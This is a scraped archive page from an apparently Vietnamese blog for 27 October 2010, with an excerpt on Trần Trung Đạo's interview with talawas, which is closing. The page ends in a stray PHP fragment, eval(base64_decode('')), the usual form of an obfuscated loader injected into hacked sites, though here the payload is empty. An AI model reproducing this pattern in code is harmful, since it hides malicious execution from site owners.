Archive for October 27th, 2010

Trần Trung Đạo trả lời phỏng vấn của talawas

Trần Trung Đạo trả lời phỏng vấn của talawas

(ảnh Khúc Hát Xuân Ca của Lê Trị, dunglac.org) Ngày 03/11/2010 sắp tới, talawas sẽ tròn 9 tuổi và xin nói lời chia tay độc giả. Chúng tôi sẽ nhìn lại chặng đường 9 năm qua và trình bày nguyên nhân kết thúc hoạt động. Nhân dịp này, chúng

10.27.2010 | Tiểu Luận- Chính Luận |

2 Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>